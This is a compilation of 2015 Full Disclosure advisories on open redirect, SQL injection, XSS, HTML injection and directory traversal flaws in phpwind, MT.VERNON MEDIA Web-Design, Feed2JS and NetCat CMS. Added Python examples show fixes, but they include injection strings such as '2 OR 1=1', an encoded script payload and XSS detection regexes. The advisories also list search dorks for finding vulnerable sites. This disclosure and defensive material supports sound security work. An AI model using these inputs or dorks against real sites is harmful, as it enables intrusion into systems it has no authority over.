sites use phpwind, there are 1,000 new sites every day use phpwind. These
community sites covering 52 types of trades every day one million people
gathered in phpwind build community, issued 50 million new information,
visit more than one billion pages. National Day PV30 million or more in
1000 about a large community, there are more than 500 sites selected
phpwind station software provided, including by scouring link Amoy
satisfaction, a daily e-commerce and marketing groups, and other on-line
product vigorously increase in revenue for the site. Excellent partners,
such as Xiamen fish, of Long Lane, Erquan network, Kunshan forum, the North
Sea 360, Huizhou West Lake, Huashang like.

phpwind has recently focused on strengthening the community's media value
and expanding e-commerce applications for communities. phpwind focuses on
small sites to explore the value of integration and applications; we
believe that the website is the community, and the community can provide a
wealth of applications to meet people's needs for information,
communication, entertainment, consumption and other living needs, gain a
sense of belonging, and become an online home. With the development of the
Internet, the forms of sites will be more abundant: the integration of
forums, more forms of information portals, and social networking sites; we
will integrate these applications into products and create the most
optimized user experience. phpwind's mission is to make the community more
valuable, so that more people enjoy the convenience of the Internet
community in order to enhance their quality of life.





*(2) Vulnerability Details:*
phpwind web application has a computer cyber security bug problem. It can
be exploited by Unvalidated Redirects and Forwards (URL Redirection)
attacks. This could allow a user to create a specially crafted URL that, if
clicked, would redirect a victim from the intended legitimate web site to
an arbitrary web site of the attacker's choosing. Such attacks are useful
as the crafted URL initially appears to be a web page of a trusted site.
This could be leveraged to direct an unsuspecting user to a web page
containing attacks that target client side software such as a web browser
or document rendering programs.

Several other similar 0-day vulnerabilities in this product have been found
by other bug hunter researchers before. phpwind has patched some of them.
The Full Disclosure mailing list is a public forum for detailed discussion
of vulnerabilities and exploitation techniques, as well as tools, papers,
news, and events of interest to the community. FD differs from other
security lists in its open nature and support for researchers' right to
decide how to disclose their own discovered bugs. The full disclosure
movement has been credited with forcing vendors to better secure their
products and to publicly acknowledge and fix flaws rather than hide them.
Vendor legal intimidation and censorship attempts are not tolerated here!
It also publishes suggestions, advisories and solution details related to
Open Redirect vulnerabilities and cyber intelligence recommendations.


*(2.1)* The first programming code flaw occurs at the url parameter in the
/goto.php page.





*References:*
http://www.tetraph.com/security/open-redirect/phpwind-v8-7-open-redirect/
http://securityrelated.blogspot.com/2015/05/phpwind-v87-xss.html
http://www.inzeed.com/kaleidoscope/computer-security/phpwind-v8-7-open-redirect/
https://webtechwire.wordpress.com/2015/05/24/phpwind-v8-7-open-redirect-2/
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01741.html
http://whitehatpost.blog.163.com/blog/static/242232054201542495731506/
http://cxsecurity.com/issue/WLB-2015030028
http://permalink.gmane.org/gmane.comp.security.oss.general/16883
http://lists.openwall.net/full-disclosure/2015/04/15/1
http://seclists.org/fulldisclosure/2015/Apr/35





--
Jing Wang
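Added example, not part of the advisory above and not phpwind code: how a goto.php?url=... style handler can validate a redirect target before issuing the Location header, which is the defensive counterpart of the open redirect described in (2). The host names in OWN_HOSTS and the default landing page are assumptions for illustration.

```python
from urllib.parse import urlsplit

# Assumption: the hostnames the forum itself is served from. Anything else
# is off-site. Replace with the real deployment's hostnames.
OWN_HOSTS = {"forum.example", "www.forum.example"}
DEFAULT_TARGET = "/"


def safe_redirect_target(url_param, own_hosts=OWN_HOSTS):
    """Return a redirect target that stays on our own site.

    Takes the raw value of a ``url``-style query parameter and returns it
    only when it points at our own site; otherwise DEFAULT_TARGET. The
    function never returns an off-site URL.
    """
    if not url_param:
        return DEFAULT_TARGET
    url_param = url_param.strip()
    # CR/LF/NUL could split the Location header; some browsers treat a
    # backslash as a slash, so "/\evil.example" would leave the site.
    if any(ch in url_param for ch in "\r\n\x00\\"):
        return DEFAULT_TARGET
    # "//evil.example" is protocol-relative and "///evil.example" is
    # collapsed by browsers into an authority, so reject both up front.
    if url_param.startswith("//"):
        return DEFAULT_TARGET

    parts = urlsplit(url_param)

    # Case 1: a site-relative path such as "/thread/42": keep it.
    if parts.scheme == "" and parts.netloc == "":
        if parts.path.startswith("/") and not parts.path.startswith("//"):
            return parts.geturl()
        return DEFAULT_TARGET

    # Case 2: an absolute URL. Only http(s) to one of our own hosts passes.
    # parts.hostname strips userinfo and port, so
    # "https://forum.example@evil.example/" is compared as "evil.example".
    if parts.scheme in ("http", "https") and parts.hostname in own_hosts:
        return parts.geturl()

    return DEFAULT_TARGET


if __name__ == "__main__":
    for sample in ("/thread/42", "https://forum.example/thread/42",
                   "https://evil.example/", "//evil.example/",
                   "https://forum.example@evil.example/"):
        print(f"{sample!r:45} -> {safe_redirect_target(sample)!r}")
```

The check is an allow-list on the parsed host, not a substring test on the raw string: a substring test for "forum.example" would accept both the userinfo trick and "forum.example.evil.example".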

[FD] MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection Web Security Vulnerabilities

2015-05-08 Thread Jing Wang
*MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection Web Security
Vulnerabilities*


Exploit Title: MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection
Security Vulnerabilities
Product: Web-Design
Vendor: MT.VERNON MEDIA
Vulnerable Versions: v1.12
Tested Version: v1.12
Advisory Publication: May 08, 2015
Latest Update: May 08, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore] (@justqdjing)



*Proposition Details:*


*(1) Vendor & Product Description:*


*Vendor:*
MT.VERNON MEDIA


*Product & Vulnerable Versions:*
Web-Design
v1.12



*Vendor URL & Download:*
MT.VERNON MEDIA can be obtained from here,
http://www.mtvernonmedia.com/services/WebDesign.html



*Google Dork:*
developed by: Mt. Vernon Media



*Product Introduction Overview:*
In today's economy every business is more focused on ROI (Return On
Investment) than ever before. We'll help you ensure a solid ROI for your
website, not only making it effective and easy to use for your clients, but
helping you to drive traffic to your site and ensuring effective content
and design to turn traffic into solid leads, sales, or repeat customers. We
offer custom design and development services tailored to your needs and
specifications drawn up jointly with you to ensure that the appropriate
technology is leveraged for optimum results, creating a dynamic and
effective design, based on market effectiveness and user-friendly design
standards. Our developers are experts in web application development using
various programming languages including Perl, SQL, C, C+, and many other
back-end programming languages, as well as database integration. For a view
of some of your past projects, take a look at our list of clients. We
handle custom development of your Internet project from conception through
publication:

Internet & Intranet sites
Design concepts, layouts, and specifications
Intuitive Graphical User Interface (GUI) design
Dynamic navigation design
Creation and manipulation of graphical design elements
GIF Animation
Flash development
HTML hand-coding and debugging
JavaScript for interactivity and error-checking
ASP (Active Server Pages)
Customized Perl CGI scripts (mailing lists, form submission, etc)
Customized application development in varied programming languages
Site publication and promotion
On-going updating and maintenance
Banner ads




*(2) Vulnerability Details:*
MT.VERNON MEDIA web application has a computer security bug problem. It can
be exploited by stored XSS attacks. This may allow a remote attacker to
create a specially crafted request that would execute arbitrary script code
in a user's browser session within the trust relationship between their
browser and the server.

Several other MT.VERNON MEDIA products' 0-day vulnerabilities have been
found by some other bug hunter researchers before. MT.VERNON MEDIA has
patched some of them. Openwall software releases and other related files
are also available from the Openwall file archive and its mirrors. You are
encouraged to use the mirrors, but be sure to verify the signatures on
software you download. The more experienced users and software developers
may use our CVSweb server to browse through the source code for most pieces
of Openwall software along with revision history information for each
source file. We publish articles, make presentations, and offer
professional services. Openwall has published suggestions, advisories and
solution details related to SQL Injection vulnerabilities.


*(2.1)* The first programming code flaw occurs at the section.php? page with
the id parameter.

*(2.2)* The second programming code flaw occurs at the illustrated_verse.php?
page with the id parameter.

*(2.3)* The third programming code flaw occurs at the image.php? page with
the id parameter.






*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/mt-vernon-media-web-design-v1-12-multiple-sql-injection/
http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-multiple_8.html
https://progressive-comp.com/?a=139222176300014&r=1&w=1
http://whitehatpost.blog.163.com/blog/static/242232054201548925221/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/mt-vernon-media-web-design-v1-12-multiple-sql-injection/
https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-US&OU=0&ItemId=44951
https://www.bugscan.net/#!/x/21160
http://bluereader.org/article/27452998







--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing
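Added example, not code from the advisory or from the MT.VERNON MEDIA product: the id-parameter pattern reported above (CWE-89), shown as a string-built query next to its parameterized replacement. The table, its rows and the in-memory SQLite backend are constructed for the demonstration; the real application's schema is not known from the post.

```python
import sqlite3


def make_demo_db():
    """Build an in-memory table standing in for the site's content store.
    Rows are constructed sample data, not data from the advisory."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE section (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)"
    )
    conn.executemany(
        "INSERT INTO section VALUES (?, ?, ?)",
        [(1, "Home", 1), (2, "Services", 1), (3, "Unpublished draft", 0)],
    )
    return conn


def lookup_section_vulnerable(conn, id_param):
    """The CWE-89 pattern: the request value becomes part of the SQL text.
    A value such as "2 OR 1=1" turns the WHERE clause into
    (published = 1 AND id = 2) OR 1=1, which returns every row, including
    the unpublished one."""
    sql = ("SELECT id, title FROM section WHERE published = 1 AND id = "
           + id_param + " ORDER BY id")
    return conn.execute(sql).fetchall()


def lookup_section_hardened(conn, id_param):
    """Validate the type first, then bind the value as a parameter so the
    database never sees it as SQL."""
    try:
        section_id = int(id_param)
    except (TypeError, ValueError):
        return []  # a non-numeric id is a bad request, not a query
    sql = ("SELECT id, title FROM section WHERE published = 1 AND id = ? "
           "ORDER BY id")
    return conn.execute(sql, (section_id,)).fetchall()


if __name__ == "__main__":
    db = make_demo_db()
    benign, hostile = "2", "2 OR 1=1"
    print("vulnerable, benign :", lookup_section_vulnerable(db, benign))
    print("vulnerable, hostile:", lookup_section_vulnerable(db, hostile))
    print("hardened,   hostile:", lookup_section_hardened(db, hostile))
```

The parameter binding is the fix; the int() cast on top of it turns malformed input into a clean error instead of a database round trip, which is also what an application-level detection rule would key on.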

[FD] MT.VERNON MEDIA Web-Design v1.12 Multiple XSS (Cross-site Scripting) Web Security Vulnerabilities

2015-05-08 Thread Jing Wang
*MT.VERNON MEDIA Web-Design v1.12 Multiple XSS (Cross-site Scripting) Web
Security Vulnerabilities*


Exploit Title: MT.VERNON MEDIA Web-Design v1.12 Multiple XSS Security
Vulnerabilities
Product: Web-Design
Vendor: MT.VERNON MEDIA
Vulnerable Versions: v1.12
Tested Version: v1.12
Advisory Publication: May 07, 2015
Latest Update: May 07, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [Mathematics, Nanyang Technological
University (NTU), Singapore] (@justqdjing)




*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
MT.VERNON MEDIA



*Product & Vulnerable Versions:*
Web-Design
v1.12



*Vendor URL & Download:*
MT.VERNON MEDIA can be obtained from here,
http://www.mtvernonmedia.com/services/WebDesign.html



*Google Dork:*
developed by: Mt. Vernon Media



*Product Introduction Overview:*
In today's economy every business is more focused on ROI (Return On
Investment) than ever before. We'll help you ensure a solid ROI for your
website, not only making it effective and easy to use for your clients, but
helping you to drive traffic to your site and ensuring effective content
and design to turn traffic into solid leads, sales, or repeat customers. We
offer custom design and development services tailored to your needs and
specifications drawn up jointly with you to ensure that the appropriate
technology is leveraged for optimum results, creating a dynamic and
effective design, based on market effectiveness and user-friendly design
standards. Our developers are experts in web application development using
various programming languages including Perl, SQL, C, C+, and many other
back-end programming languages, as well as database integration. For a view
of some of your past projects, take a look at our list of clients. We
handle custom development of your Internet project from conception through
publication:

Internet & Intranet sites
Design concepts, layouts, and specifications
Intuitive Graphical User Interface (GUI) design
Dynamic navigation design
Creation and manipulation of graphical design elements
GIF Animation
Flash development
HTML hand-coding and debugging
JavaScript for interactivity and error-checking
ASP (Active Server Pages)
Customized Perl CGI scripts (mailing lists, form submission, etc)
Customized application development in varied programming languages
Site publication and promotion
On-going updating and maintenance
Banner ads




*(2) Vulnerability Details:*
MT.VERNON MEDIA Web-Design web application has a computer security bug
problem. It can be exploited by stored XSS attacks. This may allow a remote
attacker to create a specially crafted request that would execute arbitrary
script code in a user's browser session within the trust relationship
between their browser and the server.

Several other MT.VERNON MEDIA products' 0-day vulnerabilities have been
found by some other bug hunter researchers before. MT.VERNON MEDIA has
patched some of them. BugScan is the first community-based scanner and has
gone through five code refactorings. It has redefined the concept of the
scanner and provides sources for the latest info-sec news, tools, and
advisories. It also publishes suggestions, advisories and solution details
related to XSS vulnerabilities.


*(2.1)* The first programming code flaw occurs at the section.php? page with
the id parameter.

*(2.2)* The second programming code flaw occurs at the illustrated_verse.php?
page with the id parameter.

*(2.3)* The third programming code flaw occurs at the image.php? page with
the id parameter.

*(2.4)* The fourth programming code flaw occurs at the gallery.php? page with
the np parameter.







*References:*
http://www.tetraph.com/security/xss-vulnerability/mt-vernon-media-web-design-v1-12-multiple-xss/
http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-multiple.html
http://www.inzeed.com/kaleidoscope/computer-web-security/mt-vernon-media-web-design-v1-12-multiple-xss/
https://vulnerabilitypost.wordpress.com/2015/05/08/mt-vernon-media-web-design-v1-12-multiple-xss/
http://whitehatpost.blog.163.com/blog/static/24223205420154885036469
https://progressive-comp.com/?a=139222176300014&r=1&w=1
https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-US&OU=0&ItemId=44832
https://www.bugscan.net/#!/x/21289
http://bluereader.org/article/30765596






--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS

[FD] MT.VERNON MEDIA Web-Design v1.12 HTML Injection Web Security Vulnerabilities

2015-05-08 Thread Jing Wang
*MT.VERNON MEDIA Web-Design v1.12 HTML Injection Web Security
Vulnerabilities*


Exploit Title: MT.VERNON MEDIA Web-Design v1.12 gallery.php? category
parameter HTML Injection Security Vulnerabilities
Product: Web-Design v1.12
Vendor: MT.VERNON MEDIA
Vulnerable Versions: v1.12
Tested Version: v1.12
Advisory Publication: May 08, 2015
Latest Update: May 08, 2015
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing[Mathematics, Nanyang Technological
University (NTU), Singapore] (@justqdjing)



*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
MT.VERNON MEDIA


*Product & Vulnerable Versions:*
Web-Design
v1.12


*Vendor URL & Download:*
MT.VERNON MEDIA can be obtained from here,
http://www.mtvernonmedia.com/services/WebDesign.html



*Google Dork:*
developed by: Mt. Vernon Media



*Product Introduction Overview:*
In today's economy every business is more focused on ROI (Return On
Investment) than ever before. We'll help you ensure a solid ROI for your
website, not only making it effective and easy to use for your clients, but
helping you to drive traffic to your site and ensuring effective content
and design to turn traffic into solid leads, sales, or repeat customers. We
offer custom design and development services tailored to your needs and
specifications drawn up jointly with you to ensure that the appropriate
technology is leveraged for optimum results, creating a dynamic and
effective design, based on market effectiveness and user-friendly design
standards. Our developers are experts in web application development using
various programming languages including Perl, SQL, C, C+, and many other
back-end programming languages, as well as database integration. For a view
of some of your past projects, take a look at our list of clients. We
handle custom development of your Internet project from conception through
publication:

Internet & Intranet sites
Design concepts, layouts, and specifications
Intuitive Graphical User Interface (GUI) design
Dynamic navigation design
Creation and manipulation of graphical design elements
GIF Animation
Flash development
HTML hand-coding and debugging
JavaScript for interactivity and error-checking
ASP (Active Server Pages)
Customized Perl CGI scripts (mailing lists, form submission, etc)
Customized application development in varied programming languages
Site publication and promotion
On-going updating and maintenance
Banner ads




*(2) Vulnerability Details:*
MT.VERNON MEDIA web application has a computer security bug problem. It can
be exploited by stored HTML Injection attacks. Hypertext Markup Language
(HTML) injection, also sometimes referred to as virtual defacement, is an
attack on a user made possible by an injection vulnerability in a web
application. When an application does not properly handle user supplied
data, an attacker can supply valid HTML, typically via a parameter value,
and inject their own content into the page. This attack is typically used
in conjunction with some form of social engineering, as the attack is
exploiting a code-based vulnerability and a user's trust.

Several other MT.VERNON MEDIA products' 0-day vulnerabilities have been
found by some other bug hunter researchers before. MT.VERNON MEDIA has
patched some of them. BugScan is the first community-based scanner and has
gone through five code refactorings. It has redefined the concept of the
scanner and provides sources for the latest info-sec news, tools, and
advisories. It also publishes suggestions, advisories and solution details
related to HTML vulnerabilities.


*(2.1)* The first programming code flaw occurs at the category parameter in
the gallery.php? page.





*References:*
http://www.tetraph.com/security/html-injection/mt-vernon-media-web-design-v1-12-html-injection/
http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-html.html
http://www.inzeed.com/kaleidoscope/computer-web-security/mt-vernon-media-web-design-v1-12-html-injection/
https://vulnerabilitypost.wordpress.com/2015/05/08/mt-vernon-media-web-design-v1-12-html-injection/
http://whitehatpost.blog.163.com/blog/static/24223205420154893850881/
https://progressive-comp.com/?l=full-disclosurem=142907520526783w=2
https://www.bugscan.net/#!/x/21454
http://seclists.org/fulldisclosure/2015/Apr/37
http://lists.openwall.net/full-disclosure/2015/04/15/3




--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

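Added example covering both this HTML injection post and the preceding XSS post on the same product. Neither advisory includes vendor code, so this is an illustration of the fix class (output encoding per context), not MT.VERNON MEDIA's code; the gallery.php/category naming follows the advisories, while the page templates and the sample values are constructed.

```python
import html
import re
from urllib.parse import quote


def render_gallery_vulnerable(category):
    """Echoes the request parameter into the page unchanged: the class of
    flaw reported for gallery.php?category=... and the XSS parameters."""
    return (
        f"<h2>Gallery: {category}</h2>\n"
        f'<input type="text" name="category" value="{category}">'
    )


def render_gallery_hardened(category):
    """Entity-encode for the two HTML contexts used here (element text and a
    double-quoted attribute). html.escape(quote=True) rewrites < > & " ' so
    the value can neither open a tag nor close the attribute it sits in."""
    safe = html.escape(category, quote=True)
    return (
        f"<h2>Gallery: {safe}</h2>\n"
        f'<input type="text" name="category" value="{safe}">'
    )


def render_link_hardened(category):
    """A URL context needs percent-encoding, not entity encoding."""
    return f'<a href="/gallery.php?category={quote(category, safe="")}">next</a>'


TAG_START_RE = re.compile(r"</?[A-Za-z]")


def count_tag_starts(rendered):
    """Number of places the browser would begin parsing a tag. For a fixed
    template this must not change with the user-supplied value; if it does,
    input has become markup."""
    return len(TAG_START_RE.findall(rendered))


if __name__ == "__main__":
    payload = "<b>50% off</b>"           # constructed HTML-injection value
    print(count_tag_starts(render_gallery_vulnerable(payload)))   # 7
    print(count_tag_starts(render_gallery_hardened(payload)))     # 3
    print(render_gallery_hardened('" title="injected'))
```

count_tag_starts is the kind of invariant a template test can assert: the template has three tag starts, and a rendered page with more than three means a parameter was written out raw. The attribute case shows why quote=True matters: without it the double quote survives and the value escapes the attribute even though no new tag appears.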


[FD] Feed2JS v1.7 XSS (Cross-site Scripting) Web Security Vulnerabilities

2015-05-08 Thread Jing Wang
*Feed2JS v1.7 XSS (Cross-site Scripting) Web Security Vulnerabilities*


Exploit Title: Feed2JS v1.7 magpie_debug.php? url parameter XSS Security
Vulnerabilities
Product: Feed2JS
Vendor: feed2js.org
Vulnerable Versions: v1.7
Tested Version: v1.7
Advisory Publication: May 09, 2015
Latest Update: May 09, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Jing Wang [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)




*Proposition Details:*


*(1) Vendor & Product Description:*


*Vendor:*
feed2js.org


*Product & Vulnerable Versions:*
Feed2JS
v1.7


*Vendor URL & Download:*
Feed2JS can be downloaded from here,
https://feed2js.org/index.php?s=download


*Source code:*
http://www.gnu.org/licenses/gpl.html


*Product Introduction Overview:*
What is Feed to JavaScript? An RSS Feed is a dynamically generated
summary (in XML format) of information or news published on other web
sites- so when the published RSS changes, your web site will be
automatically changed too. It is a rather simple technology that allows
you, the humble web page designer, to have this content displayed in your
own web page, without having to know a lick about XML! Think of it as a box
you define on your web page that is able to update itself, whenever the
source of the information changes, your web page does too, without you
having to do a single thing to it. This Feed2JS web site (new and
improved!) provides you a free service that can do all the hard work for
you-- in 3 easy steps:
Find the RSS source, the web address for the feed.
Use our simple tool to build the JavaScript command that will display it
Optionally style it up to look pretty.

Please keep in mind that feeds are cached on our site for 60 minutes, so if
you add content to your RSS feed, the updates will take at least an hour to
appear in any other web site using Feed2JS to display that feed. To run
these scripts, you need a web server capable of running PHP which is rather
widely available (and free). You will need to FTP files to your server,
perhaps change permissions, and make some basic edits to configure it for
your system. I give you the code, getting it to work is on your shoulders.
I will try to help, but cannot always promise answers.




*(2) Vulnerability Details:*
Feed2JS web application has a computer security bug problem. It can be
exploited by stored XSS attacks. This may allow a remote attacker to create
a specially crafted request that would execute arbitrary script code in a
user's browser session within the trust relationship between their browser
and the server.

Several other Feed2JS products' 0-day vulnerabilities have been found by
some other bug hunter researchers before. Feed2JS has patched some of them.
Openwall software releases and other related files are also available from
the Openwall file archive and its mirrors. You are encouraged to use the
mirrors, but be sure to verify the signatures on software you download. The
more experienced users and software developers may use our CVSweb server to
browse through the source code for most pieces of Openwall software along
with revision history information for each source file. We publish
articles, make presentations, and offer professional services. Openwall
has published suggestions, advisories and solution details related to XSS
vulnerabilities.


*(2.1)* The first programming code flaw occurs at the url parameter in the
magpie_debug.php? page.





*References:*
http://www.tetraph.com/security/xss-vulnerability/feed2js-v1-7-xss/
http://securityrelated.blogspot.com/2015/05/feed2js-v17-xss-cross-site-scripting.html
http://www.inzeed.com/kaleidoscope/computer-web-security/feed2js-v1-7-xss/
https://vulnerabilitypost.wordpress.com/2015/05/08/feed2js-v1-7-xss/
http://whitehatpost.blog.163.com/blog/static/24223205420154810359682/
https://progressive-comp.com/?l=full-disclosurem=142907534026807w=2
https://www.bugscan.net/#!/x/21291
http://bluereader.org/article/27452996
http://lists.openwall.net/full-disclosure/2015/04/15/4




--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

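Added example, not from the advisory or from Feed2JS: the detection-side view of the reflected parameters named in this post (magpie_debug.php?url) and in the MT.VERNON MEDIA posts (gallery.php?category), scanning combined-format web server access-log lines for markup in query-string values. The log lines are constructed, using documentation-range IP addresses, and the signature list is a starting point, not a complete ruleset.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format: client, identity, user, [time], "request", status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Fragments that have no business in a plain feed URL or category value:
# a tag start, a javascript: scheme, or an event-handler attribute preceded
# by whitespace or a quote (so a value like "online=1" is not flagged).
MARKUP_RE = re.compile(
    r"</?[a-z][a-z0-9]*|javascript\s*:|[\s\"']on[a-z]+\s*=",
    re.IGNORECASE,
)


def suspicious_params(target):
    """Return (name, decoded value) pairs whose value contains markup."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; catch double-encoding
        if MARKUP_RE.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_access_log(lines):
    """One alert per request whose parameters carry markup. A 200 status on
    such a request is the case worth triage: the page rendered the value."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m["target"])
        if hits:
            alerts.append({
                "ip": m["ip"],
                "path": urlsplit(m["target"]).path,
                "status": int(m["status"]),
                "params": hits,
            })
    return alerts


# Constructed sample lines (not real traffic); paths mirror the advisories.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/May/2015:10:01:12 +0000] "GET /magpie_debug.php?url=http://feeds.example/rss.xml HTTP/1.1" 200 5120',
    '203.0.113.7 - - [08/May/2015:10:01:20 +0000] "GET /magpie_debug.php?url=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 812',
    '198.51.100.4 - - [08/May/2015:10:02:05 +0000] "GET /gallery.php?category=flowers HTTP/1.1" 200 2048',
    '198.51.100.4 - - [08/May/2015:10:02:09 +0000] "GET /gallery.php?category=%253Cb%253ESale%253C%252Fb%253E HTTP/1.1" 200 2048',
    '198.51.100.4 - - [08/May/2015:10:02:11 +0000] "GET /gallery.php?category=online=1 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert)
```

The fourth sample line is double-encoded; a scanner that decodes only once sees "%3Cb%3E" and misses it, which is why suspicious_params decodes the already-decoded parse_qsl value a second time.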


[FD] NetCat CMS 3.12 HTML Injection Security Vulnerabilities

2015-04-14 Thread Jing Wang
*NetCat CMS 3.12 HTML Injection Security Vulnerabilities*


Exploit Title: NetCat CMS 3.12 /catalog/search.php? q Parameter HTML
Injection Security Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: April 15, 2015
Latest Update: April 15, 2015
Vulnerability Type: Improper Input Validation [CWE-20]
CVE Reference: *
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
NetCat


*Product & Version:*
NetCat
3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL & Download:*
NetCat can be downloaded from here,
http://netcat.ru/


*Product Introduction:*
NetCat.ru is a Russian local company. NetCat is designed to create the
absolute majority of the types of sites: from a simple business card with
minimal content to complex web-based systems, from corporate offices to
online stores, libraries or media data - in other words, projects in
completely different directions and at any level of complexity. Examples of
sites running on NetCat CMS can be viewed in a special section.

Even an inexperienced user can manage a site based on NetCat, because it
does not require knowledge of Internet technologies, programming and markup
languages. NetCat is constantly improving and adds new features. In the
process of finalizing it, the wishes of our partners and clients, as well
as trends in Internet development, are necessarily taken into account. More
than 2,000 studios and private web developers have chosen NetCat for their
projects, and by 2013 more than 18,000 sites had been created that run
successfully on our CMS.





*(2) Vulnerability Details:*
NetCat web application has a security bug problem. It can be exploited by
HTML Injection attacks. Hypertext Markup Language (HTML) injection, also
sometimes referred to as virtual defacement, is an attack on a user made
possible by an injection vulnerability in a web application. When an
application does not properly handle user supplied data, an attacker can
supply valid HTML, typically via a parameter value, and inject their own
content into the page. This attack is typically used in conjunction with
some form of social engineering, as the attack is exploiting a code-based
vulnerability and a user's trust.

Several NetCat products' 0-day vulnerabilities have been found by some other
bug hunter researchers before. NetCat has patched some of them. Web
Security Watch is an aggregator of security reports coming from various
sources. It aims to provide a single point of tracking for all publicly
disclosed security issues that matter. Its unique tagging system enables
you to see a relevant set of tags associated with each security alert for a
quick overview of the affected products. What's more, you can now subscribe
to an RSS feed containing the specific tags that you are interested in -
you will then only receive alerts related to those tags. It has published
suggestions, advisories and solution details related to HTML vulnerabilities.

*(2.1)* The vulnerability occurs at the catalog/search.php? page with the q
parameter.





*References:*
http://tetraph.com/security/html-injection/netcat-cms-3-12-html-injection/
http://securityrelated.blogspot.com/2015/04/netcat-cms-312-html-injection-security.html
http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-3-12-html-injection/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-3-12-html-injection/
https://computerpitch.wordpress.com/2015/04/14/netcat-cms-3-12-html-injection-security-vulnerabilities/
http://www.irist.ir/author-Wang%20Jing.html
http://lists.openwall.net/full-disclosure/2015/03/02/5
http://www.websecuritywatch.com/multiple-http-response-splitting-crlf-xss-vulnerabilities-in-netcat-cms/
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1676



--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing



[FD] NetCat CMS 3.12 Multiple Directory Traversal Security Vulnerabilities

2015-04-14 Thread Jing Wang
*NetCat CMS 3.12 Multiple Directory Traversal Security Vulnerabilities*


Exploit Title: NetCat CMS 3.12 Multiple Directory Traversal Security
Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
